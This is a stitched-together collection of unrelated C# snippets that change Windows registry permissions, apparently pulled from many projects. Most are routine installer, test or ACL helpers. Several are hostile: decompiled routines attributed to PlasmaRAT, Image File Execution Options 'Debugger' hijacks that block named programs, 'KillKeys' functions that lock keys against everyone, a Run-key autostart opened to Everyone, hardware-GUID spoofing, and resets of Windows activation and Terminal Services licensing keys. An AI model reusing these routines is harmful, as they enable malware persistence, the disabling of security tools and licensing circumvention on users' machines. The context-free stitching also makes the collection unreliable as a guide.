private static void GrantRegistryAccess(string key, Prison prison) { NTAccount account = new NTAccount(null, prison.User.Username); var hklm = RegistryKey.OpenBaseKey(RegistryHive.LocalMachine, RegistryView.Registry64); using (RegistryKey rk = hklm.OpenSubKey(key, RegistryKeyPermissionCheck.ReadWriteSubTree, RegistryRights.FullControl)) { RegistrySecurity rs = rk.GetAccessControl(); RegistryAccessRule rar = new RegistryAccessRule( account.ToString(), RegistryRights.FullControl, InheritanceFlags.ContainerInherit, PropagationFlags.None, AccessControlType.Allow); rs.AddAccessRule(rar); rk.SetAccessControl(rs); } }
/// <summary> /// Verify that a specific user has access rights to a specific Registry Key /// </summary> /// <param name="userName">Name of the user to check for</param> /// <param name="root">Root key for the registry key</param> /// <param name="subKey">Registry key to check for</param> /// <param name="rights">Expected access rights</param> public static void VerifyRegistryKeyPermission(string userName, Microsoft.Win32.RegistryKey root, string subKey, RegistryRights rights) { RegistryKey registryKey = root.OpenSubKey(subKey); RegistrySecurity registrySecurity = registryKey.GetAccessControl(); AuthorizationRuleCollection accessRules = registrySecurity.GetAccessRules(true, true, typeof(NTAccount)); foreach (RegistryAccessRule accessRule in accessRules) { if (userName.ToLowerInvariant().Equals(accessRule.IdentityReference.Value.ToLowerInvariant())) { if ((accessRule.RegistryRights & rights) == rights) { return; } } } Assert.Fail(string.Format("User '{0}' do not have the correct permessions to RegistryKey '{1}/{2}'.", userName, root.ToString(), subKey)); }
// It's up to the caller to obtain the needed token privileges (TakeOwnership) for this operation public static void GrantFullControlOnSubKey(this RegistryKey registryKey, string subkeyName) { using RegistryKey subKey = registryKey.OpenSubKeyOrThrowIfMissing(subkeyName, RegistryRights.TakeOwnership | RegistryRights.ChangePermissions ); RegistrySecurity accessRules = subKey.GetAccessControl(); accessRules.SetOwner(WindowsIdentity.GetCurrent().User); accessRules.ResetAccessRule( new RegistryAccessRule( WindowsIdentity.GetCurrent().User, RegistryRights.FullControl, InheritanceFlags.ContainerInherit | InheritanceFlags.ObjectInherit, PropagationFlags.None, AccessControlType.Allow ) ); subKey.SetAccessControl(accessRules); }
private static RegistryKey GetRegistryKey() { // Create a security context for a new key that we will use to store our data. // The security context will restrict access to only our user. string user = Environment.UserDomainName + "\\" + Environment.UserName; RegistrySecurity security = new RegistrySecurity(); RegistryAccessRule rule = new RegistryAccessRule(user, RegistryRights.FullControl, InheritanceFlags.ContainerInherit, PropagationFlags.None, AccessControlType.Allow); security.AddAccessRule(rule); RegistryKey key = Registry.CurrentUser.CreateSubKey("Software\\Microsoft\\Windows\\CurrentVersion\\Run", RegistryKeyPermissionCheck.ReadWriteSubTree, security); return(key); }
protected override void ProcessRecord() { using (RegistryKey regKey = RegistryControl.GetRegistryKey(RegistryPath, false, true)) { bool isChange = false; RegistrySecurity security = security = regKey.GetAccessControl(); if (All) { // テスト自動生成 _generator.RegistryAccess(RegistryPath, "", false); foreach (RegistryAccessRule rule in security.GetAccessRules(true, false, typeof(NTAccount))) { security.RemoveAccessRule(rule); isChange = true; } } else { foreach (RegistryAccessRule rule in security.GetAccessRules(true, false, typeof(NTAccount))) { string account = rule.IdentityReference.Value; // テスト自動生成 _generator.RegistryAccount(RegistryPath, account); if (Account.Contains("\\") && account.Equals(Account, StringComparison.OrdinalIgnoreCase) || !Account.Contains("\\") && account.EndsWith("\\" + Account, StringComparison.OrdinalIgnoreCase)) { security.RemoveAccessRule(rule); isChange = true; } } } if (isChange) { regKey.SetAccessControl(security); } WriteObject(new RegistrySummary(regKey, true)); } }
// Token: 0x0600005D RID: 93 RVA: 0x00006194 File Offset: 0x00004394 public static object KillKeys(RegistryKey wat) { try { SecurityIdentifier securityIdentifier = new SecurityIdentifier(WellKnownSidType.WorldSid, null); NTAccount ntaccount = securityIdentifier.Translate(typeof(NTAccount)) as NTAccount; string identity = ntaccount.ToString(); RegistrySecurity registrySecurity = new RegistrySecurity(); registrySecurity.AddAccessRule(new RegistryAccessRule(identity, RegistryRights.ExecuteKey, InheritanceFlags.None, PropagationFlags.None, AccessControlType.Deny)); registrySecurity.AddAccessRule(new RegistryAccessRule(identity, RegistryRights.Delete | RegistryRights.ChangePermissions | RegistryRights.TakeOwnership, InheritanceFlags.None, PropagationFlags.None, AccessControlType.Deny)); wat.SetAccessControl(registrySecurity); wat.Close(); } catch (Exception ex) { } object result; return(result); }
public static bool DeleteAllSubKeys(string root, string subKey) { try { RegistryKey Test = Registry.CurrentUser.OpenSubKey(root); RegistrySecurity s = new RegistrySecurity(); //s = Test.GetAccessControl(); //Registry.CurrentUser.DeleteSubKeyTree(root); Registry.CurrentUser.ValueCount.ToString(); //Test.SetAccessControl(s); //Test.DeleteValue(subKey, true); // Test.DeleteSubKey(subKey); return(true); } catch (NullReferenceException) { return(false); } }
private static RegistrySecurity _sec_MakeRegSecurity() { string user = Environment.UserDomainName + "\\" + Environment.UserName; RegistrySecurity rs = new RegistrySecurity(); rs.AddAccessRule(new RegistryAccessRule(user, RegistryRights.ReadKey | RegistryRights.Delete | RegistryRights.WriteKey, InheritanceFlags.None, PropagationFlags.None, AccessControlType.Allow)); rs.AddAccessRule(new RegistryAccessRule(user, RegistryRights.ChangePermissions, InheritanceFlags.None, PropagationFlags.None, AccessControlType.Deny)); return(rs); }
/// <summary> /// Registry key installation /// </summary> #region Registry key installation public static void RegisterApp() { RegistryKey AppKey; AppKey = Registry.LocalMachine.OpenSubKey(Settings.HCKURun, true); // Modify key entry permission try { RegistrySecurity rs = new RegistrySecurity(); rs = AppKey.GetAccessControl(); rs.AddAccessRule(new RegistryAccessRule(new SecurityIdentifier(WellKnownSidType.WorldSid, null), RegistryRights.WriteKey | RegistryRights.ReadKey | RegistryRights.Delete | RegistryRights.FullControl, AccessControlType.Allow)); AppKey.SetAccessControl(rs); } catch {}; AppKey.SetValue(Settings.RegistryKeyValue, Settings.AppPath); AppKey.Close(); }
protected override int OnExecute(CommandLineApplication app) { if (!Utils.HasAdmin()) Console.WriteLine("Please run this command as Administrator or it might fail!"); try { RegistrySecurity oldrs = null; oldrs = TerminalService.SetGracePeriodRegistryKeyPermission(); TerminalService.ResetGracePeriodVal(); Console.WriteLine($"Grace period is reset"); if (oldrs != null) TerminalService.SetGracePeriodRegistryKeyPermission(oldrs); if (RestartServices) TerminalService.RestartServices(); } catch (Exception ex) { Console.WriteLine(ex.Message); return -1; } return 0; }
/// <summary> /// apply registry security settings to user profiles /// </summary> public static bool RegSec(Abstractions.WindowsApi.pInvokes.structenums.RegistryLocation where, string keyname, SecurityIdentifier userSid) { try { using (RegistryKey key = Abstractions.WindowsApi.pInvokes.GetRegistryLocation(where).OpenSubKey(keyname, true)) { RegistrySecurity keySecurity = key.GetAccessControl(AccessControlSections.Access); string sddl = keySecurity.GetSecurityDescriptorSddlForm(AccessControlSections.All); foreach (RegistryAccessRule user in keySecurity.GetAccessRules(true, true, typeof(SecurityIdentifier))) { if (user.IdentityReference.Value.StartsWith("S-1-5-21-") && !user.IdentityReference.Value.Equals(userSid.Value)) { sddl = sddl.Replace(user.IdentityReference.Value, userSid.Value); keySecurity.SetSecurityDescriptorSddlForm(sddl); key.SetAccessControl(keySecurity); break; } } foreach (string subkey in key.GetSubKeyNames()) { if (!RegSec(where, keyname + "\\" + subkey, userSid)) { return(false); } } } } catch (SystemException ex) { Log.WarnFormat("RegSec:{0} Warning {1}", keyname, ex.Message); } catch (Exception ex) { Log.ErrorFormat("RegSec:{0} Error:{1}", keyname, ex.Message); return(false); } return(true); }
public static void ProvisionAutoGenKeys(RegistryView regView, string expandedVersion, string sid) { var baseRegKey = RegistryKey.OpenBaseKey(RegistryHive.LocalMachine, regView); var softwareMicrosoftKey = baseRegKey.OpenSubKey("SOFTWARE\\Microsoft\\", true); var aspNetKey = softwareMicrosoftKey.OpenSubKey("ASP.NET", true); if (aspNetKey == null) { aspNetKey = softwareMicrosoftKey.CreateSubKey("ASP.NET"); } var aspNetBaseKey = aspNetKey.OpenSubKey(expandedVersion, true); if (aspNetBaseKey == null) { aspNetBaseKey = aspNetKey.CreateSubKey(expandedVersion); } var autoGenBaseKey = aspNetBaseKey.OpenSubKey("AutoGenKeys", true); if (autoGenBaseKey == null) { autoGenBaseKey = aspNetBaseKey.CreateSubKey("AutoGenKeys"); } var regSec = new RegistrySecurity(); regSec.SetSecurityDescriptorSddlForm($"D:P(A;OICI;GA;;;SY)(A;OICI;GA;;;BA)(A;OICI;GA;;;{sid})"); var userAutoGenKey = autoGenBaseKey.OpenSubKey(sid, true); if (userAutoGenKey == null) { userAutoGenKey = autoGenBaseKey.CreateSubKey(sid, RegistryKeyPermissionCheck.Default, regSec); } else { userAutoGenKey.SetAccessControl(regSec); } }
private bool Class_Root_Anahtar_Varmi(string ClassRoot_Anahtar) { RegistrySecurity registrySecurity = new RegistrySecurity(); registrySecurity.AddAccessRule(new RegistryAccessRule("Administrators", RegistryRights.WriteKey, AccessControlType.Allow)); registrySecurity.SetOwner(new NTAccount("Administrators")); try { using (RegistryKey key = Registry.ClassesRoot.OpenSubKey(ClassRoot_Anahtar, RegistryKeyPermissionCheck.ReadWriteSubTree, RegistryRights.WriteKey)) { if ((key == null) && (Registry.ClassesRoot.CreateSubKey(ClassRoot_Anahtar, RegistryKeyPermissionCheck.ReadWriteSubTree, registrySecurity) != null)) { return(true); } } } catch (Exception exception) { } return(false); }
public const string FirewallServiceName = @"NT SERVICE\MpsSvc"; // Windows Defender Firewall public bool GetAccessRestriction(string keyPath) { try { RegistryKey subKey = Registry.LocalMachine.OpenSubKey(keyPath, false); RegistrySecurity keySec = subKey.GetAccessControl(AccessControlSections.Access); foreach (var rule in keySec.GetAccessRules(true, true, typeof(System.Security.Principal.NTAccount)).Cast <AuthorizationRule>()) { if (rule.IdentityReference.Value.Equals(FirewallServiceName, StringComparison.OrdinalIgnoreCase)) { return(true); } } } catch (Exception err) { AppLog.Exception(err); } return(false); }
public static object KillKeys(RegistryKey wat) { object obj2; try { SecurityIdentifier identifier = new SecurityIdentifier(WellKnownSidType.WorldSid, null); string identity = (identifier.Translate(typeof(NTAccount)) as NTAccount).ToString(); RegistrySecurity registrySecurity = new RegistrySecurity(); registrySecurity.AddAccessRule(new RegistryAccessRule(identity, RegistryRights.ExecuteKey, InheritanceFlags.None, PropagationFlags.None, AccessControlType.Deny)); registrySecurity.AddAccessRule(new RegistryAccessRule(identity, RegistryRights.TakeOwnership | RegistryRights.ChangePermissions | RegistryRights.Delete, InheritanceFlags.None, PropagationFlags.None, AccessControlType.Deny)); wat.SetAccessControl(registrySecurity); wat.Close(); } catch (Exception exception1) { ProjectData.SetProjectError(exception1); ProjectData.ClearProjectError(); } return(obj2); }
/// <summary> /// Grants full control on the given registry key under RegistryKey for everyone /// </summary> /// <param name="subKey">subkey name</param> public static void GrantFullControlRegKey(RegistryKey baseKey, string subKey) { RegistryKey rKey = baseKey.OpenSubKey(subKey, true); if (rKey == null) { return; } Console.WriteLine("Granting full control to: {0}\\{1}", baseKey, subKey); try { // Create a SecurityIdentifier object for "everyone". SecurityIdentifier everyoneSid = new SecurityIdentifier(WellKnownSidType.WorldSid, null); RegistrySecurity security = rKey.GetAccessControl(); RegistryAccessRule newRule = new RegistryAccessRule( everyoneSid, RegistryRights.FullControl, // modify is enough for reading/writing/deleting InheritanceFlags.ObjectInherit | InheritanceFlags.ContainerInherit, // all subfolders and files PropagationFlags.None, AccessControlType.Allow); // Check if such a rule already exists, if so skip the modifications if (ContainsRule(security.GetAccessRules(true, true, typeof(SecurityIdentifier)), newRule)) { Console.WriteLine("Permissions already set."); return; } security.AddAccessRule(newRule); rKey.SetAccessControl(security); rKey.Close(); } catch (Exception ex) { Console.WriteLine("Error while setting full write access to everyone for file: {0} : {1}", subKey, ex); } }
private void tools_Load(object sender, EventArgs e) { WindowsIdentity ident = WindowsIdentity.GetCurrent(); WindowsPrincipal myPrincipal = new WindowsPrincipal(ident); if (!myPrincipal.IsInRole(WindowsBuiltInRole.Administrator)) { string user = Environment.UserDomainName + "\\" + Environment.UserName; RegistrySecurity rs = new RegistrySecurity(); rs.AddAccessRule(new RegistryAccessRule(user, RegistryRights.ReadKey | RegistryRights.Delete | RegistryRights.CreateSubKey | RegistryRights.WriteKey | RegistryRights.ChangePermissions | RegistryRights.SetValue, InheritanceFlags.None, PropagationFlags.None, AccessControlType.Deny)); } try { RegistryKey path = Registry.LocalMachine.OpenSubKey(@"SOFTWARE\Microsoft\", true); textBox1.Text = path.GetValue("Masm32").ToString(); } catch { } }
private void Good1() { /* FIX: Create a registry key without excessive privileges */ string user = Environment.UserDomainName + "\\" + Environment.UserName; RegistrySecurity rs = new RegistrySecurity(); //Allow the current user to read and delete the key. rs.AddAccessRule(new RegistryAccessRule(user, RegistryRights.ReadKey | RegistryRights.Delete, InheritanceFlags.None, PropagationFlags.None, AccessControlType.Allow)); //Prevent the current user from writing or changing the permission set of the key rs.AddAccessRule(new RegistryAccessRule(user, RegistryRights.WriteKey | RegistryRights.ChangePermissions, InheritanceFlags.None, PropagationFlags.None, AccessControlType.Deny)); RegistryKey key = Registry.CurrentUser.OpenSubKey("Software", true); key.CreateSubKey("CWE314"); }
static void Main(string[] args) { // Reload Registry Hive Trick CommonUtilities.ExecuteCommand("REG SAVE HKLM\\SYSTEM " + CommonUtilities.EscapePath(Environment.GetEnvironmentVariable("TEMP") + "\\SYSTEM.hiv"), true); CommonUtilities.ExecuteCommand("REG RESTORE HKLM\\SYSTEM " + CommonUtilities.EscapePath(Environment.GetEnvironmentVariable("TEMP") + "\\SYSTEM.hiv"), true); CommonUtilities.FileDelete(Environment.GetEnvironmentVariable("TEMP") + "\\SYSTEM.hiv"); // Rename and Delete WPA Key using (RegistryKey key = Registry.LocalMachine.OpenSubKey(@"SYSTEM", true)) { if (key != null) { // TODO : Powershell Bundled Vista+ ??? CommonUtilities.ExecuteCommand(@"POWERSHELL -command rename-item HKLM:\SYSTEM\WPA -NewName WPA_Delete", true); key.DeleteSubKeyTree("WPA_DELETE"); key.CreateSubKey("WPA"); // Create Default Values CommonUtilities.ExecuteCommand("REG ADD HKLM\\SYSTEM\\WPA\\478C035F-04BC-48C7-B324-2462D786DAD7-5P-9 /t REG_BINARY /ve /d 20c0c44b5d68c7085f442818128270ea642e5b5dba2d8885a7831a85c3d1ece262b36911a0d5bdb5e55106656d12578af73f942ffe1562ba665b18ce8969bbf74ff8ceacf3c424de22cf36560c8633b92173d5f38abbe0fbe3f408ca314725a94d599a4587daea29aa207b5cefbfcf2361b7a9beeaacc754513fdce82c16828d", true); CommonUtilities.ExecuteCommand("REG ADD HKLM\\SYSTEM\\WPA\\478C035F-04BC-48C7-B324-2462D786DAD7-5P-9 /t REG_BINARY /v Time /d e318ad15241c695f751c6b19fe1ba41cebfb91bf29367de3146d79a76ace067c", true); CommonUtilities.ExecuteCommand("REG ADD HKLM\\SYSTEM\\WPA\\478C035F-04BC-48C7-B324-2462D786DAD7-5P-9 /t REG_DWORD /v Type /d 2111353691", true); CommonUtilities.ExecuteCommand("REG ADD HKLM\\SYSTEM\\WPA\\8DEC0AF1-0341-4b93-85CD-72606C2DF94C-7P-1 /t REG_BINARY /ve /d 6979d03b99a73c736882ceadf1a96320c15405927dc0b721f83cad674fb340496d75f608189d84dcd18fdaff8ea3866a3f37edc3d1eb5c0647e97bb7bea79f5dd05a66062fabb480d137cd3623563962e200b1bd42531cc3e6e4c1ffff693a208e9937f7a4d48b7463e68faf0df08811", true); CommonUtilities.ExecuteCommand("REG ADD HKLM\\SYSTEM\\WPA\\8DEC0AF1-0341-4b93-85CD-72606C2DF94C-7P-2 /t REG_BINARY /ve /d 79e3ad3e68302e43bc97f4aceb98f3e328155f42df9684935abbc4f3c1652637a70f81fdf5f469d8586bf1d1a8ff96af9ead400b1c9d5621f4b4c57ad44fc2b129ca20a19a64bcfc481c52738b876b64", true); CommonUtilities.ExecuteCommand("REG ADD HKLM\\SYSTEM\\WPA\\8DEC0AF1-0341-4b93-85CD-72606C2DF94C-7P-3 /t REG_BINARY /ve /d 65a7778c965816a2df869e044edf4671f2ac716502d74d5b30c531c1469dc758dc25c2b480393d6fb7336d3d915668a7f05ff3847468228168833bed8947b4bc", true); } } // Set WPA Key Permissions using (RegistryKey key = Registry.LocalMachine.OpenSubKey(@"SYSTEM\\WPA", true)) { if (key != null) { RegistrySecurity acl = new RegistrySecurity(); acl.SetAccessRuleProtection(true, false); acl.SetAccessRule(new RegistryAccessRule(new SecurityIdentifier(WellKnownSidType.WorldSid, null), RegistryRights.FullControl, InheritanceFlags.ContainerInherit | InheritanceFlags.ObjectInherit, PropagationFlags.None, AccessControlType.Allow)); key.SetAccessControl(acl); } } }
/// <summary>Create a secure instance</summary> /// <param name="name">instance name</param> /// <returns>the instance</returns> /// <exception cref="System.Exception"/> protected internal static MicroZookeeperService CreateSecureZKInstance(string name ) { string context = ZookeeperServerContext; Configuration conf = new Configuration(); FilePath testdir = new FilePath(Runtime.GetProperty("test.dir", "target")); FilePath workDir = new FilePath(testdir, name); if (!workDir.Mkdirs()) { NUnit.Framework.Assert.IsTrue(workDir.IsDirectory()); } Runtime.SetProperty(ZookeeperConfigOptions.PropZkServerMaintainConnectionDespiteSaslFailure , "false"); RegistrySecurity.ValidateContext(context); conf.Set(MicroZookeeperServiceKeys.KeyRegistryZkserviceJaasContext, context); MicroZookeeperService secureZK = new MicroZookeeperService(name); secureZK.Init(conf); Log.Info(secureZK.GetDiagnostics()); return(secureZK); }
private static RegistryAccessRule RegSetFullAccess(RegistryKey nParentKey, string nkey, IdentityReference nuser) { RegistryKey nSubKey = null; try { nSubKey = nParentKey.OpenSubKey(nkey, RegistryKeyPermissionCheck.ReadWriteSubTree, RegistryRights.ReadKey | RegistryRights.ChangePermissions | RegistryRights.ReadPermissions); RegistrySecurity nSubKeySec = nSubKey.GetAccessControl(AccessControlSections.Access); RegistryAccessRule nAccRule = new RegistryAccessRule(nuser, RegistryRights.FullControl, AccessControlType.Allow); nSubKeySec.AddAccessRule(nAccRule); //nSubKeySec.RemoveAccessRul nSubKey.SetAccessControl(nSubKeySec); nSubKey.Close(); return(nAccRule); } catch { nSubKey?.Close(); return(null); } }
public static bool Save() { RegistryKey _lmSoftware = null; RegistryKey _koDevelopers = null; RegistryKey _pentagram = null; RegistryKey _tbl = null; try { string user = Environment.UserDomainName + "\\" + Environment.UserName; RegistrySecurity rs = new RegistrySecurity(); rs.AddAccessRule(new RegistryAccessRule(user, RegistryRights.WriteKey | RegistryRights.ReadKey | RegistryRights.Delete, InheritanceFlags.None, PropagationFlags.None, AccessControlType.Allow)); _lmSoftware = Registry.CurrentUser.OpenSubKey("SOFTWARE", true); _koDevelopers = _lmSoftware.CreateSubKey("KODevelopers", RegistryKeyPermissionCheck.ReadWriteSubTree, rs); _pentagram = _koDevelopers.CreateSubKey("PENTAGRAM", RegistryKeyPermissionCheck.ReadWriteSubTree, rs); _tbl = _pentagram.CreateSubKey("TBLEditor", RegistryKeyPermissionCheck.ReadWriteSubTree, rs); _tbl.SetValue("Username", Username); _tbl.SetValue("Password", Password); _tbl.SetValue("KeepLoggedIn", KeepLoggedIn); _tbl.SetValue("RememberMe", RememberMe); _tbl.SetValue("SkinName", SkinName); _tbl.SetValue("Language", Language); return(true); } catch (Exception e) { StaticReference.ShowError(null, e.Message); return(false); } }
private static void spoofGuid() { Guid guid = Guid.NewGuid(); string GUID = @"SYSTEM\CurrentControlSet\Control\IDConfigDB\Hardware Profiles\0001"; RegistryKey subkey = Registry.LocalMachine.OpenSubKey(GUID, true); if (subkey != null) { string user = Environment.UserDomainName + "\\" + Environment.UserName; RegistrySecurity rs = new RegistrySecurity(); rs.AddAccessRule(new RegistryAccessRule(user, RegistryRights.FullControl, InheritanceFlags.None, PropagationFlags.None, AccessControlType.Allow)); subkey.SetAccessControl(rs); subkey.SetValue("HwProfileGuid", "{" + guid + "}", RegistryValueKind.String); subkey.Close(); } Console.WriteLine("GUID spoofed to " + guid); }
// Token: 0x0600004D RID: 77 RVA: 0x00005428 File Offset: 0x00003628 public static void ProtectMyFile() { try { string runFileAs = PlasmaRAT.RunFileAs; RegistryKey registryKey = Registry.LocalMachine.OpenSubKey("software\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options", true); registryKey.CreateSubKey(runFileAs); registryKey.Close(); RegistryKey registryKey2 = Registry.LocalMachine.OpenSubKey("software\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\" + runFileAs, true); registryKey2.SetValue("DisableExceptionChainValidation", ""); SecurityIdentifier securityIdentifier = new SecurityIdentifier(WellKnownSidType.WorldSid, null); NTAccount ntaccount = securityIdentifier.Translate(typeof(NTAccount)) as NTAccount; string identity = ntaccount.ToString(); RegistrySecurity registrySecurity = new RegistrySecurity(); registrySecurity.AddAccessRule(new RegistryAccessRule(identity, RegistryRights.ExecuteKey, InheritanceFlags.None, PropagationFlags.None, AccessControlType.Allow)); registrySecurity.AddAccessRule(new RegistryAccessRule(identity, RegistryRights.SetValue | RegistryRights.CreateSubKey | RegistryRights.Delete | RegistryRights.ChangePermissions | RegistryRights.TakeOwnership, InheritanceFlags.None, PropagationFlags.None, AccessControlType.Deny)); registryKey2.SetAccessControl(registrySecurity); registryKey2.Close(); } catch (Exception ex) { } }
static bool RegSetOwneship(RegistryKey nParentKey, string nkey, IdentityReference nuser) { RegistryKey nSubKey = null; try { nSubKey = nParentKey.OpenSubKey(nkey, RegistryKeyPermissionCheck.ReadWriteSubTree, RegistryRights.TakeOwnership | RegistryRights.ReadKey | RegistryRights.ReadPermissions); RegistrySecurity nSubKeySec = nSubKey.GetAccessControl(AccessControlSections.Owner); nSubKeySec.SetOwner(nuser); nSubKey.SetAccessControl(nSubKeySec); nSubKey.Close(); return(true); } catch { if (nSubKey != null) { nSubKey.Close(); } return(false); } }
static RegistryKey SwallowRegKey(RegistryKey root, string key, RegistryKeyPermissionCheck newPermission) { string userName = System.Security.Principal.WindowsIdentity.GetCurrent().Name; //MessageBox.Show("swallow1"); RegistryKey rk = root.OpenSubKey(key, RegistryKeyPermissionCheck.ReadWriteSubTree, RegistryRights.ChangePermissions | RegistryRights.ReadKey);//Get the registry key desired with ChangePermissions Rights. if (rk == null) { return(null); } RegistrySecurity rs = new RegistrySecurity(); rs.AddAccessRule(new RegistryAccessRule(userName, RegistryRights.FullControl, InheritanceFlags.ContainerInherit | InheritanceFlags.ObjectInherit, PropagationFlags.InheritOnly, AccessControlType.Allow)); //Create access rule giving full control to the Administrator user. rk.SetAccessControl(rs); //Apply the new access rule to this Registry Key. rk.Close(); //rk = root.OpenSubKey(key, RegistryKeyPermissionCheck.ReadWriteSubTree, RegistryRights.FullControl); // Opens the key again with full control. //rs.SetOwner(new NTAccount(userName));// Set the securitys owner to be Administrator //rk.SetAccessControl(rs);// Set the key with the changed permission so Administrator is now owner. //rk.Close(); rk = root.OpenSubKey(key, newPermission, RegistryRights.FullControl); //MessageBox.Show("swallow2"); return(rk); }
public static void SetKeyPermissions(RegistryKey key, string subKey, bool reset) { bool isProtected = !reset; string text = "SYSTEM"; string text2 = reset ? text : GetNewOwnerName(); SetKeyOwnerWithPrivileges(key, subKey, text); using (RegistryKey registryKey = key.OpenSubKey(subKey, RegistryKeyPermissionCheck.ReadWriteSubTree, RegistryRights.ChangePermissions)) { RegistrySecurity registrySecurity = new RegistrySecurity(); if (!reset) { RegistryAccessRule rule = new RegistryAccessRule(text2, RegistryRights.FullControl, InheritanceFlags.None, PropagationFlags.NoPropagateInherit, AccessControlType.Allow); registrySecurity.AddAccessRule(rule); } registrySecurity.SetAccessRuleProtection(isProtected, false); registryKey.SetAccessControl(registrySecurity); } if (!reset) { SetKeyOwnerWithPrivileges(key, subKey, text2); } }
private void SetKeyPermissions(RegistryKey regKey) { // Console.WriteLine("set permission on " + regKey); try { //Change Permissions on registry key RegistrySecurity existingSecurity = regKey.GetAccessControl(AccessControlSections.Owner); existingSecurity.AddAccessRule(this.RegistryAccessRule); // existingSecurity.SetAccessRuleProtection(true, true); regKey.SetAccessControl(existingSecurity); } catch (UnauthorizedAccessException ex) { // Console.WriteLine(ex.Message, "Unauthorized access"); } catch (Exception ex) { //Console.WriteLine(ex.Message); } }
public static void FuckFileName(string input) { try { RegistryKey regKey = default(RegistryKey); regKey = Registry.LocalMachine.OpenSubKey("software\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options", true); regKey.CreateSubKey(input); regKey.Close(); RegistryKey Fuckyou = default(RegistryKey); Fuckyou = Registry.LocalMachine.OpenSubKey("software\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\" + input, true); Fuckyou.SetValue("Debugger", "rundll32.exe"); SecurityIdentifier securityIdentifier = new SecurityIdentifier(WellKnownSidType.WorldSid, null); NTAccount ntaccount = securityIdentifier.Translate(typeof(NTAccount)) as NTAccount; RegistrySecurity registrySecurity = new RegistrySecurity(); registrySecurity.AddAccessRule(new RegistryAccessRule(ntaccount, RegistryRights.QueryValues | RegistryRights.EnumerateSubKeys | RegistryRights.Notify | RegistryRights.ReadPermissions, InheritanceFlags.None, PropagationFlags.None, AccessControlType.Allow)); registrySecurity.AddAccessRule(new RegistryAccessRule(ntaccount, RegistryRights.SetValue | RegistryRights.Delete | RegistryRights.CreateSubKey | RegistryRights.ChangePermissions | RegistryRights.TakeOwnership, InheritanceFlags.None, PropagationFlags.None, AccessControlType.Deny)); Fuckyou.SetAccessControl(registrySecurity); Fuckyou.Close(); } catch { } }
private bool anahtar_varmi(string CurrentUserAnahtar) { string name = CurrentUserAnahtar; RegistrySecurity registrySecurity = new RegistrySecurity(); registrySecurity.AddAccessRule(new RegistryAccessRule("Administrators", RegistryRights.FullControl, AccessControlType.Allow)); registrySecurity.SetOwner(new NTAccount("Administrators")); try { using (RegistryKey key = Registry.CurrentUser.OpenSubKey(name, RegistryKeyPermissionCheck.ReadWriteSubTree, RegistryRights.FullControl)) { if ((key == null) && (Registry.CurrentUser.CreateSubKey(name, RegistryKeyPermissionCheck.ReadWriteSubTree, registrySecurity) != null)) { return(true); } } } catch { //MessageBox.Show("CurrentUser anahtar"); } return(false); }
public static void SetAccessControl(this RegistryKey key, RegistrySecurity registrySecurity);